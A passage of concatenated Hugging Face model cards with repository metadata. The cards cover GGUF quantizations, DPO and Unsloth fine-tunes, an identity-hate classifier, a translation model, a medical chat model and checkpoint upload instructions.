mradermacher/Zhi-writing-dsr1-14b-i1-GGUF
mradermacher
2025-05-30T07:47:40Z
686
2
transformers
[ "transformers", "gguf", "qwen2", "zh", "en", "dataset:Congliu/Chinese-DeepSeek-R1-Distill-data-110k", "dataset:cognitivecomputations/dolphin-r1", "dataset:open-thoughts/OpenThoughts-114k", "dataset:qihoo360/Light-R1-SFTData", "dataset:qihoo360/Light-R1-DPOData", "base_model:Zhihu-ai/Zhi-Create-DSR1-14B", "base_model:quantized:Zhihu-ai/Zhi-Create-DSR1-14B", "license:apache-2.0", "endpoints_compatible", "region:us", "imatrix", "conversational" ]
null
2025-04-19T11:38:03Z
--- base_model: Zhihu-ai/Zhi-Create-DSR1-14B datasets: - Congliu/Chinese-DeepSeek-R1-Distill-data-110k - cognitivecomputations/dolphin-r1 - open-thoughts/OpenThoughts-114k - qihoo360/Light-R1-SFTData - qihoo360/Light-R1-DPOData language: - zh - en library_name: transformers license: apache-2.0 quantized_by: mradermacher tags: - qwen2 --- ## About <!-- ### quantize_version: 2 --> <!-- ### output_tensor_quantised: 1 --> <!-- ### convert_type: hf --> <!-- ### vocab_type: --> <!-- ### tags: nicoboss --> weighted/imatrix quants of https://huggingface.co/Zhihu-ai/Zhi-Create-DSR1-14B <!-- provided-files --> static quants are available at https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-GGUF ## Usage If you are unsure how to use GGUF files, refer to one of [TheBloke's READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for more details, including on how to concatenate multi-part files. ## Provided Quants (sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants) | Link | Type | Size/GB | Notes | |:-----|:-----|--------:|:------| | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ1_S.gguf) | i1-IQ1_S | 3.7 | for the desperate | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ1_M.gguf) | i1-IQ1_M | 4.0 | mostly desperate | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ2_XXS.gguf) | i1-IQ2_XXS | 4.4 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ2_XS.gguf) | i1-IQ2_XS | 4.8 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ2_S.gguf) | i1-IQ2_S | 5.1 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ2_M.gguf) | i1-IQ2_M | 5.5 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q2_K_S.gguf) | i1-Q2_K_S | 5.5 | very low quality | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q2_K.gguf) | i1-Q2_K | 5.9 | IQ3_XXS probably better | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ3_XXS.gguf) | i1-IQ3_XXS | 6.0 | lower quality | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ3_XS.gguf) | i1-IQ3_XS | 6.5 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q3_K_S.gguf) | i1-Q3_K_S | 6.8 | IQ3_XS probably better | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ3_S.gguf) | i1-IQ3_S | 6.8 | beats Q3_K* | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ3_M.gguf) | i1-IQ3_M | 7.0 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q3_K_M.gguf) | i1-Q3_K_M | 7.4 | IQ3_S probably better | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q3_K_L.gguf) | i1-Q3_K_L | 8.0 | IQ3_M probably better | | 
[GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ4_XS.gguf) | i1-IQ4_XS | 8.2 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q4_0.gguf) | i1-Q4_0 | 8.6 | fast, low quality | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ4_NL.gguf) | i1-IQ4_NL | 8.6 | prefer IQ4_XS | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q4_K_S.gguf) | i1-Q4_K_S | 8.7 | optimal size/speed/quality | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q4_K_M.gguf) | i1-Q4_K_M | 9.1 | fast, recommended | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q4_1.gguf) | i1-Q4_1 | 9.5 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q5_K_S.gguf) | i1-Q5_K_S | 10.4 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q5_K_M.gguf) | i1-Q5_K_M | 10.6 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q6_K.gguf) | i1-Q6_K | 12.2 | practically like static Q6_K | Here is a handy graph by ikawrakow comparing some lower-quality quant types (lower is better): ![image.png](https://www.nethype.de/huggingface_embed/quantpplgraph.png) And here are Artefact2's thoughts on the matter: https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9 ## FAQ / Model Request See https://huggingface.co/mradermacher/model_requests for some answers to questions you might have and/or if you want some other model quantized. ## Thanks I thank my company, [nethype GmbH](https://www.nethype.de/), for letting me use its servers and providing upgrades to my workstation to enable this work in my free time. Additional thanks to [@nicoboss](https://huggingface.co/nicoboss) for giving me access to his private supercomputer, enabling me to provide many more imatrix quants, at much higher quality, than I would otherwise be able to. <!-- end -->
Fotiissss/whisper-large-v3-turbo-lora-merged
Fotiissss
2025-05-30T07:47:06Z
2
0
transformers
[ "transformers", "safetensors", "whisper", "automatic-speech-recognition", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
automatic-speech-recognition
2025-05-30T07:44:07Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
AmberYifan/Llama-3.1-8B-sft-SPIN-gpt4o-beta0.8-lr1e-7
AmberYifan
2025-05-30T07:46:20Z
0
0
transformers
[ "transformers", "safetensors", "llama", "text-generation", "generated_from_trainer", "trl", "dpo", "conversational", "arxiv:2305.18290", "base_model:AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF", "base_model:finetune:AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T07:25:54Z
--- base_model: AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF library_name: transformers model_name: Llama-3.1-8B-sft-SPIN-gpt4o-beta0.8-lr1e-7 tags: - generated_from_trainer - trl - dpo licence: license --- # Model Card for Llama-3.1-8B-sft-SPIN-gpt4o-beta0.8-lr1e-7 This model is a fine-tuned version of [AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF](https://huggingface.co/AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="AmberYifan/Llama-3.1-8B-sft-SPIN-gpt4o-beta0.8-lr1e-7", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure [<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/yifanwang/huggingface/runs/ooli2zcv) This model was trained with DPO, a method introduced in [Direct Preference Optimization: Your Language Model is Secretly a Reward Model](https://huggingface.co/papers/2305.18290). ### Framework versions - TRL: 0.12.2 - Transformers: 4.46.3 - Pytorch: 2.7.0 - Datasets: 3.6.0 - Tokenizers: 0.20.3 ## Citations Cite DPO as: ```bibtex @inproceedings{rafailov2023direct, title = {{Direct Preference Optimization: Your Language Model is Secretly a Reward Model}}, author = {Rafael Rafailov and Archit Sharma and Eric Mitchell and Christopher D. Manning and Stefano Ermon and Chelsea Finn}, year = 2023, booktitle = {Advances in Neural Information Processing Systems 36: Annual Conference on Neural Information Processing Systems 2023, NeurIPS 2023, New Orleans, LA, USA, December 10 - 16, 2023}, url = {http://papers.nips.cc/paper_files/paper/2023/hash/a85b405ed65c6477a4fe8302b5e06ce7-Abstract-Conference.html}, editor = {Alice Oh and Tristan Naumann and Amir Globerson and Kate Saenko and Moritz Hardt and Sergey Levine}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
robotgeneralist/openpi-nomagic
robotgeneralist
2025-05-30T07:45:37Z
0
0
null
[ "license:mit", "region:us" ]
null
2025-04-14T18:14:58Z
--- license: mit --- # Nomagic Simple / Adversarial Box Model Checkpoints This is a repo to store the most important checkpoints of the `openpi` model. ## Uploading checkpoints Since the checkpoints are huge, the fastest and most reliable way to upload them is by using the `upload-large-folder` command from `huggingface-cli`. To do so, you first have to log in with appropriate credentials (you need a token with write permissions to the target repository): ``` huggingface-cli login ``` Next, use `upload-large-folder`. For example, to upload the `checkpoints` directory to the remote repository, run: ``` huggingface-cli upload-large-folder robotgeneralist/openpi-nomagic-multibox checkpoints --repo-type=model ``` Note that there is no way to specify a target path where the data will be stored on the remote. The contents of the directory will be placed under the root directory. So, for example, if your local folder is organized like the following: ``` checkpoints --some-dir --file1 --file2 ``` after uploading to the remote, you will have: ``` some-dir --file1 --file2 ``` Luckily, you can still upload additional files later on. For example, if after the first upload you try to upload: ``` checkpoints --some-dir --file3 --file4 ``` the remote will become: ``` some-dir --file1 --file2 --file3 --file4 ``` Hence, even though slightly inconvenient, this seems to be the best method for uploading big checkpoints, because of its efficiency and robustness.
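If you need the `checkpoints/` prefix itself to survive on the remote, one workaround is to stage the data one directory level deeper before uploading, so that the folder you want becomes part of the uploaded contents. The following is a minimal sketch under that assumption (the `staging` directory name is arbitrary):
```
# Stage the data so that "checkpoints/" is itself part of the uploaded tree
mkdir -p staging/checkpoints
cp -r checkpoints/* staging/checkpoints/

# Upload the staging directory; its contents (here: checkpoints/) land at the repo root
huggingface-cli upload-large-folder robotgeneralist/openpi-nomagic-multibox staging --repo-type=model
```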
Mridul2003/identity-hate-detector
Mridul2003
2025-05-30T07:42:46Z
2
0
null
[ "safetensors", "bert", "base_model:unitary/toxic-bert", "base_model:finetune:unitary/toxic-bert", "region:us" ]
null
2025-05-28T08:26:04Z
--- metrics: - accuracy base_model: - unitary/toxic-bert --- Use Model
```python
import torch
from transformers import AutoTokenizer, AutoModelForSequenceClassification

device = torch.device("cuda" if torch.cuda.is_available() else "cpu")

# Load the fine-tuned binary classifier and its tokenizer
identity_model = AutoModelForSequenceClassification.from_pretrained("Mridul2003/identity-hate-detector").to(device)
identity_tokenizer = AutoTokenizer.from_pretrained("Mridul2003/identity-hate-detector")

# Example input text and a dict to collect scores
final_text = "Example text to classify"
results = {}

identity_inputs = identity_tokenizer(final_text, return_tensors="pt", padding=True, truncation=True)
if 'token_type_ids' in identity_inputs:
    del identity_inputs['token_type_ids']
identity_inputs = {k: v.to(device) for k, v in identity_inputs.items()}

with torch.no_grad():
    identity_outputs = identity_model(**identity_inputs)
    identity_probs = torch.sigmoid(identity_outputs.logits)
    identity_prob = identity_probs[0][1].item()
    not_identity_prob = identity_probs[0][0].item()

results["identity_hate_custom"] = identity_prob
results["not_identity_hate_custom"] = not_identity_prob
```
# Offensive Language Classifier (Fine-Tuned on Custom Dataset) This repository contains a fine-tuned version of the [`unitary/toxic-bert`](https://huggingface.co/unitary/toxic-bert) model for binary classification of offensive language (labels: `Offensive` vs `Not Offensive`). The model has been specifically fine-tuned on a custom dataset due to limitations observed in the base model's performance, particularly with `identity_hate` related content. --- ## 🔍 Problem with Base Model (`unitary/toxic-bert`) The original `unitary/toxic-bert` model is trained for multi-label toxicity detection with 6 categories: - toxic - severe toxic - obscene - threat - insult - identity_hate While it performs reasonably well on generic toxicity, **it struggles with edge cases involving identity-based hate speech**, often: - Misclassifying subtle or sarcastic identity attacks - Underestimating offensive content with identity-specific slurs --- ## ✅ Why Fine-Tune? We fine-tuned the model on a custom annotated dataset with two clear labels: - `0`: Not Identity Hate - `1`: Identity Hate The new model simplifies the task into a **binary classification problem**, allowing more focused training for real-world moderation scenarios. --- ## 📊 Dataset Overview - Total examples: ~4,000+ - Balanced between offensive and non-offensive labels - Contains high proportions of `identity_hate`, `obscene`, `insult`, and more nuanced samples --- ## 🧠 Model Details - **Base model**: [`unitary/toxic-bert`](https://huggingface.co/unitary/toxic-bert) - **Fine-tuned using**: Hugging Face 🤗 `Trainer` API - **Loss function**: CrossEntropyLoss (via `num_labels=2`) - **Batch size**: 8 - **Epochs**: 3 - **Learning rate**: 2e-5 --- ## 🔬 Performance (Binary Classification) | Metric | Value | |----------|---------| | Accuracy | ~92% | | Precision / Recall | Balanced | ---
2yunadaaa/qwen2.5-4b-3kingdoms-augmented
2yunadaaa
2025-05-30T07:39:54Z
0
0
transformers
[ "transformers", "text-generation-inference", "unsloth", "qwen2", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-05-30T07:39:43Z
--- base_model: unsloth/qwen2.5-7b-instruct-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - qwen2 - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** 2yunadaaa - **License:** apache-2.0 - **Finetuned from model :** unsloth/qwen2.5-7b-instruct-unsloth-bnb-4bit This qwen2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
BSC-LT/salamandraTA-7B-instruct-GGUF
BSC-LT
2025-05-30T07:37:46Z
262
0
transformers
[ "transformers", "gguf", "llama", "text-generation", "translation", "bg", "ca", "cs", "cy", "da", "de", "el", "en", "es", "et", "eu", "fi", "fr", "ga", "gl", "hr", "hu", "it", "lt", "lv", "mt", "nl", "nb", "no", "nn", "oc", "pl", "pt", "ro", "ru", "sl", "sk", "sr", "sv", "uk", "ast", "an", "base_model:BSC-LT/salamandraTA-7b-instruct", "base_model:quantized:BSC-LT/salamandraTA-7b-instruct", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:eu", "conversational" ]
translation
2025-03-03T08:38:47Z
--- library_name: transformers license: apache-2.0 pipeline_tag: translation language: - bg - ca - cs - cy - da - de - el - en - es - et - eu - fi - fr - ga - gl - hr - hu - it - lt - lv - mt - nl - nb - 'no' - nn - oc - pl - pt - ro - ru - sl - sk - sr - sv - uk - ast - an base_model: - BSC-LT/salamandraTA-7b-instruct --- ![image/png](https://cdn-uploads.huggingface.co/production/uploads/633b489acbdbadd99c0b75ef/MhsW4ODhK6ofYq8DnpyKc.png) # SalamandraTA-7B-instruct-GGUF Model Card This model is the GGUF-quantized version of [SalamandraTA-7b-instruct](https://huggingface.co/BSC-LT/salamandraTA-7b-instruct). The model weights are quantized from FP16 to Q8_0 (8-bit quantization), Q4_K_M (4-bit weights with K-means clustering quantization) and Q3_K_M (3-bit weights with K-means clustering quantization) using the [Llama.cpp](https://github.com/ggml-org/llama.cpp) framework. Inference with this model can be done using [vLLM](https://docs.vllm.ai/en/stable/models/engine_args.html). SalamandraTA-7b-instruct is a translation LLM that has been instruction-tuned from SalamandraTA-7b-base. The base model results from continually pre-training [Salamandra-7b](https://huggingface.co/BSC-LT/salamandra-7b) on parallel data and has not been published, as it is reserved for internal use. SalamandraTA-7b-instruct is proficient in 35 European languages (plus 3 varieties) and supports translation-related tasks, namely: sentence-level translation, paragraph-level translation, document-level translation, automatic post-editing, grammar checking, machine translation evaluation, alternative translations, named-entity recognition and context-aware translation. > [!WARNING] > **DISCLAIMER:** This version of Salamandra is tailored exclusively for translation tasks. It lacks chat capabilities and has not been trained with any chat instructions. --- The entire Salamandra family is released under a permissive [Apache 2.0 license](https://www.apache.org/licenses/LICENSE-2.0). ## How to Use The following example code works under ``Python 3.10.4``, ``vllm==0.7.3``, ``torch==2.5.1`` and ``torchvision==0.20.1``, though it should run on any current version of the libraries. This is an example of translation using the model: ``` from huggingface_hub import snapshot_download from vllm import LLM, SamplingParams model_dir = snapshot_download(repo_id="BSC-LT/salamandraTA-7B-instruct-GGUF", revision="main") model_name = "salamandrata_7b_inst_q4.gguf" llm = LLM(model=model_dir + '/' + model_name, tokenizer=model_dir) source = "Spanish" target = "English" sentence = "Ayer se fue, tomó sus cosas y se puso a navegar. Una camisa, un pantalón vaquero y una canción, dónde irá, dónde irá. Se despidió, y decidió batirse en duelo con el mar. Y recorrer el mundo en su velero. Y navegar, nai-na-na, navegar." prompt = f"Translate the following text from {source} into {target}.\\n{source}: {sentence} \\n{target}:" messages = [{'role': 'user', 'content': prompt}] outputs = llm.chat(messages, sampling_params=SamplingParams( temperature=0.1, stop_token_ids=[5], max_tokens=200) )[0].outputs print(outputs[0].text) ``` ## Additional information ### Author The Language Technologies Unit from Barcelona Supercomputing Center. ### Contact For further information, please send an email to <[email protected]>. ### Copyright Copyright(c) 2025 by Language Technologies Unit, Barcelona Supercomputing Center. ### Funding This work has been promoted and financed by the Government of Catalonia through the [Aina Project](https://projecteaina.cat/). 
This work is funded by the _Ministerio para la Transformación Digital y de la Función Pública_ - Funded by EU – NextGenerationEU within the framework of [ILENIA Project](https://proyectoilenia.es/) with reference 2022/TL22/00215337. ### Acknowledgements The success of this project has been made possible thanks to the invaluable contributions of our partners in the [ILENIA Project](https://proyectoilenia.es/): [HiTZ](http://hitz.ehu.eus/es), and [CiTIUS](https://citius.gal/es/). Their efforts have been instrumental in advancing our work, and we sincerely appreciate their help and support. ### Disclaimer Be aware that the model may contain biases or other unintended distortions. When third parties deploy systems or provide services based on this model, or use the model themselves, they bear the responsibility for mitigating any associated risks and ensuring compliance with applicable regulations, including those governing the use of Artificial Intelligence. The Barcelona Supercomputing Center, as the owner and creator of the model, shall not be held liable for any outcomes resulting from third-party use. ### License [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0)
hongzhouyu/FineMedLM
hongzhouyu
2025-05-30T07:36:14Z
11
0
transformers
[ "transformers", "tensorboard", "safetensors", "llama", "text-generation", "medical", "conversational", "en", "zh", "dataset:hongzhouyu/FineMed-SFT", "arxiv:2501.09213", "base_model:meta-llama/Llama-3.1-8B", "base_model:finetune:meta-llama/Llama-3.1-8B", "license:mit", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-01-23T07:29:08Z
--- license: mit datasets: - hongzhouyu/FineMed-SFT language: - en - zh base_model: - meta-llama/Llama-3.1-8B library_name: transformers tags: - medical --- <div align="center"> <h1> FineMedLM </h1> </div> <div align="center"> <a href="https://github.com/hongzhouyu/FineMed" target="_blank">GitHub</a> | <a href="https://arxiv.org/abs/2501.09213" target="_blank">Paper</a> </div> # <span>Introduction</span> **FineMedLM** is a medical chat LLM trained via SFT on meticulously crafted synthetic data. By further applying DPO, the model acquires enhanced deep reasoning capabilities, culminating in the development of [FineMedLM-o1](https://huggingface.co/hongzhouyu/FineMedLM-o1). For more information, visit our GitHub repository. # <span>Usage</span> You can use FineMedLM in the same way as `Llama-3.1-8B-Instruct`: (⚠️**Note**: Please use the system prompt we provide to achieve better inference results) ```python from transformers import AutoModelForCausalLM, AutoTokenizer main_model_name = "hongzhouyu/FineMedLM" model = AutoModelForCausalLM.from_pretrained(main_model_name, device_map="auto") tokenizer = AutoTokenizer.from_pretrained(main_model_name) prompt = ( """The following are multiple choice questions (with answers) about health. Think step by step and then finish your answer with "the answer is (X)" where X is the correct letter choice. Question: Polio can be eradicated by which of the following? Options: A. Herbal remedies B. Use of antibiotics C. Regular intake of vitamins D. Administration of tetanus vaccine E. Attention to sewage control and hygiene F. Natural immunity acquired through exposure G. Use of antiviral drugs Answer: Let's think step by step. """ ) messages = [ {"role": "system", "content": "You are a helpful professional doctor. The user will give you a medical question, and you should answer it in a professional way."}, {"role": "user", "content": prompt} ] text = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True) print(text) model_inputs = tokenizer(text, return_tensors="pt").to(model.device) print("-----start generate-----") generated_ids = model.generate( model_inputs.input_ids, max_new_tokens=2048, eos_token_id=tokenizer.eos_token_id ) answer = tokenizer.decode(generated_ids[0], skip_special_tokens=False) print(answer) ``` # <span>Citation</span> ``` @misc{yu2025finemedlmo1enhancingmedicalreasoning, title={FineMedLM-o1: Enhancing the Medical Reasoning Ability of LLM from Supervised Fine-Tuning to Test-Time Training}, author={Hongzhou Yu and Tianhao Cheng and Ying Cheng and Rui Feng}, year={2025}, eprint={2501.09213}, archivePrefix={arXiv}, primaryClass={cs.CL}, url={https://arxiv.org/abs/2501.09213}, } ```
chargoddard/mixtralmerge-8x7B-rebalanced-test
chargoddard
2025-05-30T07:31:12Z
13
0
transformers
[ "transformers", "pytorch", "safetensors", "mixtral", "text-generation", "merge", "mergekit", "conversational", "dataset:Open-Orca/SlimOrca", "license:cc-by-nc-4.0", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2024-01-04T07:49:22Z
--- license: cc-by-nc-4.0 tags: - merge - mergekit datasets: - Open-Orca/SlimOrca --- This is a dumb experiment - don't expect it to be good! I merged a few Mixtral models together and then tuned *only the routing parameters*. There was a pretty steep drop in loss with only a bit of training - went from ~0.99 to ~0.7 over about ten million tokens. I'm hoping this after-the-fact balancing will have reduced some of the nasty behavior typical of current tunes. But maybe it just made it even dumber! We'll see. Uses ChatML format. Will update with more details if it turns out promising.
TOMFORD79/Tom8
TOMFORD79
2025-05-30T07:27:35Z
0
0
null
[ "safetensors", "any-to-any", "omega", "omegalabs", "bittensor", "agi", "license:mit", "region:us" ]
any-to-any
2025-05-30T06:16:10Z
--- license: mit tags: - any-to-any - omega - omegalabs - bittensor - agi --- This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet. Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
keioio/chatbot_english_deepseek_v3
keioio
2025-05-30T07:23:45Z
0
0
transformers
[ "transformers", "pytorch", "safetensors", "llama", "text-generation", "text-generation-inference", "unsloth", "trl", "sft", "conversational", "en", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T07:18:48Z
--- base_model: unsloth/deepseek-r1-distill-llama-8b-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - llama - trl - sft license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** keioio - **License:** apache-2.0 - **Finetuned from model :** unsloth/deepseek-r1-distill-llama-8b-unsloth-bnb-4bit This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
tojifushiguro123123/GISUA-lora-finetuned
tojifushiguro123123
2025-05-30T07:22:31Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-05-30T07:22:21Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, 